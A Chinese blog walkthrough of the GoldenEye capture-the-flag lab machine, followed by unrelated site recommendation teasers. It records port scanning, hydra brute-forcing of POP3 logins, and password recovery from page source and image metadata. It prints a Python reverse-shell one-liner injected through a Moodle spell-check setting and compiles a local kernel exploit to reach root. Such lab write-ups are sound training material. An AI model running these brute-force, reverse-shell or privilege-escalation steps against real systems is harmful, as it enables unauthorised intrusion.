GoldenEye

netdiscover -r 192.168.133.0找到靶機(jī)
nmap -p- 192.168.133.220掃描全端口,發(fā)現(xiàn)只有幾個(gè)端口開放

圖片.png

訪問80端口


圖片.png

根據(jù)他的提示去/sev-home/路徑下静盅,發(fā)現(xiàn)是登錄的界面,但是并沒有賬號(hào)密碼,只能回去繼續(xù)看默認(rèn)頁面了

F12發(fā)現(xiàn)存在一個(gè)terminal.js文件,查看文件內(nèi)容,是吧對(duì)應(yīng)的密碼進(jìn)行html編碼了,InvincibleHack3r這個(gè)就是對(duì)應(yīng)的密碼寝殴,然后根據(jù)上面的內(nèi)容,用boris登陸

tiip

登陸成功之后,給了下一個(gè)提示,f12查看源代碼,發(fā)現(xiàn)最底下的注釋,提示了用戶名


圖片.png
圖片.png

我們可以知道55006 55007其中一個(gè)有可能是pop3端口,使用nc連接55007端口,根據(jù)回顯消息看到pop3的字樣

圖片.png

接下來用haydra進(jìn)行爆破,使用kali自帶的密碼字典(別問為什么,我也不知道奈籽,網(wǎng)上抄的垂涯。。抵蚊。)施绎,命令如下
hydra -s 55007 -L uname.txt -P /usr/share/wordlists/fasttrack.txt -t 64 192.168.133.222 pop3

找到兩個(gè)用戶的賬號(hào)密碼了溯革。

圖片.png

接下來利用得到的用戶名密碼登入系統(tǒng)


圖片.png
USER boris(通過該命令輸入用戶名boris)
PASS secret1! (使用該命令輸入用戶的密碼。之后谷醉,我們從目標(biāo)計(jì)算機(jī)收到了登陸成功的消息致稀,說明已在目標(biāo)系統(tǒng)上成功通過了身份驗(yàn)證)
LIST(用于顯示目標(biāo)系統(tǒng)上所有可用的電子郵件)
RETR ID_number (用來查看指定ID的電子郵件)

看到第二封郵件的時(shí)候發(fā)現(xiàn)給了提示


圖片.png

然后修改自己本地的HOSTS文件

圖片.png

用剛才郵件中提到的那個(gè)賬號(hào)密碼登陸,登進(jìn)去之后下面顯示有發(fā)送郵件提示俱尼,點(diǎn)進(jìn)去看看

圖片.png

得知了用戶名抖单,接著爆破一波?拿到了用戶名密碼遇八,登陸上去矛绘,在主頁發(fā)現(xiàn)管理員用戶名admin,密碼不知道

繼續(xù)點(diǎn)著看看,發(fā)現(xiàn)一個(gè)TXT文件

圖片.png

看到一個(gè)路徑刃永,看看下載下來是什么货矮,一張jpg圖片,作為一個(gè)多年的MISC狗第一反應(yīng)就是看詳細(xì)信息

圖片.png

發(fā)現(xiàn)base64的字符串斯够,解碼一下看看次屠,結(jié)果為xWinter1995x!

可能這就是之前admin用戶的密碼?雳刺?試了一下竟然對(duì)了~

圖片.png

進(jìn)去之后發(fā)現(xiàn)在編輯的頁面發(fā)現(xiàn)版本號(hào)劫灶,求助google了

圖片.png

然后發(fā)現(xiàn)一個(gè)貌似能執(zhí)行命令的地方,先去編輯器處將默認(rèn)的改為PSpellShell

圖片.png

然后返回之前執(zhí)行命令那個(gè)地方

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.133.206",4433));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

然后需要調(diào)用系統(tǒng)的拼寫檢查,從而讓系統(tǒng)執(zhí)行我們對(duì)應(yīng)的命令

圖片.png

已經(jīng)彈回shell了


圖片.png

查看當(dāng)前權(quán)限和內(nèi)核版本


圖片.png

在kali里面搜一波


圖片.png

目標(biāo)機(jī)器里面沒有g(shù)cc掖桦,先修改c文件,直接把里面的gcc修改成cc即可

圖片.png
補(bǔ)充一下:
cc是Unix的C編譯器本昏,全程為c compiler,而gcc為L(zhǎng)inux的枪汪,全稱為GNU compiler collection,是一個(gè)編譯器集合涌穆,既可以編譯c也可以編譯c++.

用python的簡(jiǎn)單文件服務(wù)器,傳到靶機(jī)上去
python -m SimpleHTTPServer 8999

然后編譯執(zhí)行一把梭

cc 37292.c -o exp
chmod 777 exp
./exp
圖片.png

直接去root家目錄讀flag


圖片.png

最后還有一個(gè)彩蛋雀久,優(yōu)秀


圖片.png

使用msf提權(quán)宿稀,簡(jiǎn)單寫寫,只是為了試試好不好使

圖片.png

圖片.png

圖片.png
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 人面猴
    序言:七十年代末赖捌,一起剝皮案震驚了整個(gè)濱河市祝沸,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌越庇,老刑警劉巖罩锐,帶你破解...
    沈念sama閱讀 219,110評(píng)論 6 508
  • 死咒
    序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場(chǎng)離奇詭異卤唉,居然都是意外死亡涩惑,警方通過查閱死者的電腦和手機(jī),發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 93,443評(píng)論 3 395
  • 救了他兩次的神仙讓他今天三更去死
    文/潘曉璐 我一進(jìn)店門桑驱,熙熙樓的掌柜王于貴愁眉苦臉地迎上來竭恬,“玉大人跛蛋,你說我怎么就攤上這事∪叮” “怎么了赊级?”我有些...
    開封第一講書人閱讀 165,474評(píng)論 0 356
  • 道士緝兇錄:失蹤的賣姜人
    文/不壞的土叔 我叫張陵,是天一觀的道長(zhǎng)寿桨。 經(jīng)常有香客問我此衅,道長(zhǎng),這世上最難降的妖魔是什么亭螟? 我笑而不...
    開封第一講書人閱讀 58,881評(píng)論 1 295
  • ?港島之戀(遺憾婚禮)
    正文 為了忘掉前任挡鞍,我火速辦了婚禮,結(jié)果婚禮上预烙,老公的妹妹穿的比我還像新娘墨微。我一直安慰自己,他們只是感情好扁掸,可當(dāng)我...
    茶點(diǎn)故事閱讀 67,902評(píng)論 6 392
  • 惡毒庶女頂嫁案:這布局不是一般人想出來的
    文/花漫 我一把揭開白布翘县。 她就那樣靜靜地躺著,像睡著了一般谴分。 火紅的嫁衣襯著肌膚如雪锈麸。 梳的紋絲不亂的頭發(fā)上,一...
    開封第一講書人閱讀 51,698評(píng)論 1 305
  • 城市分裂傳說
    那天牺蹄,我揣著相機(jī)與錄音忘伞,去河邊找鬼。 笑死沙兰,一個(gè)胖子當(dāng)著我的面吹牛氓奈,可吹牛的內(nèi)容都是我干的。 我是一名探鬼主播鼎天,決...
    沈念sama閱讀 40,418評(píng)論 3 419
  • 雙鴛鴦連環(huán)套:你想象不到人心有多黑
    文/蒼蘭香墨 我猛地睜開眼舀奶,長(zhǎng)吁一口氣:“原來是場(chǎng)噩夢(mèng)啊……” “哼!你這毒婦竟也來了斋射?” 一聲冷哼從身側(cè)響起育勺,我...
    開封第一講書人閱讀 39,332評(píng)論 0 276
  • 萬榮殺人案實(shí)錄
    序言:老撾萬榮一對(duì)情侶失蹤,失蹤者是張志新(化名)和其女友劉穎绩鸣,沒想到半個(gè)月后怀大,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 45,796評(píng)論 1 316
  • ?護(hù)林員之死
    正文 獨(dú)居荒郊野嶺守林人離奇死亡呀闻,尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 37,968評(píng)論 3 337
  • ?白月光啟示錄
    正文 我和宋清朗相戀三年,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了潜慎。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片捡多。...
    茶點(diǎn)故事閱讀 40,110評(píng)論 1 351
  • 活死人
    序言:一個(gè)原本活蹦亂跳的男人離奇死亡蓖康,死狀恐怖,靈堂內(nèi)的尸體忽然破棺而出垒手,到底是詐尸還是另有隱情蒜焊,我是刑警寧澤,帶...
    沈念sama閱讀 35,792評(píng)論 5 346
  • ?日本核電站爆炸內(nèi)幕
    正文 年R本政府宣布科贬,位于F島的核電站泳梆,受9級(jí)特大地震影響,放射性物質(zhì)發(fā)生泄漏榜掌。R本人自食惡果不足惜优妙,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 41,455評(píng)論 3 331
  • 男人毒藥:我在死后第九天來索命
    文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望憎账。 院中可真熱鬧套硼,春花似錦、人聲如沸胞皱。這莊子的主人今日做“春日...
    開封第一講書人閱讀 32,003評(píng)論 0 22
  • 一樁弒父案,背后竟有這般陰謀
    文/蒼蘭香墨 我抬頭看了看天上的太陽反砌。三九已至雾鬼,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間宴树,已是汗流浹背策菜。 一陣腳步聲響...
    開封第一講書人閱讀 33,130評(píng)論 1 272
  • 情欲美人皮
    我被黑心中介騙來泰國(guó)打工, 沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留森渐,地道東北人做入。 一個(gè)月前我還...
    沈念sama閱讀 48,348評(píng)論 3 373
  • 代替公主和親
    正文 我出身青樓,卻偏偏與公主長(zhǎng)得像同衣,于是被迫代替她去往敵國(guó)和親竟块。 傳聞我的和親對(duì)象是個(gè)殘疾皇子,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 45,047評(píng)論 2 355

推薦閱讀更多精彩內(nèi)容

  • 1.參考 It's themed after the great James Bond film (and eve...
    3mi1e閱讀 814評(píng)論 0 4
  • win7 cmd管理員權(quán)限設(shè)置 net localgroup administrators 用戶名 /add 把“...
    f675b1a02698閱讀 5,202評(píng)論 0 11
  • 命令簡(jiǎn)介 cmd是command的縮寫.即命令行 耐齐。 雖然隨著計(jì)算機(jī)產(chǎn)業(yè)的發(fā)展浪秘,Windows 操作系統(tǒng)的應(yīng)用越來...
    Littleston閱讀 3,319評(píng)論 0 12
  • 一、命令行 1. calc-----------啟動(dòng)計(jì)算器 2.certmgr.msc----證書管理實(shí)用程序 3...
    小小辛_c閱讀 705評(píng)論 0 2
  • 運(yùn)行操作 CMD命令:開始->運(yùn)行->鍵入cmd或command(在命令行里可以看到系統(tǒng)版本埠况、文件系統(tǒng)版本) CM...
    小明yz閱讀 2,761評(píng)論 0 8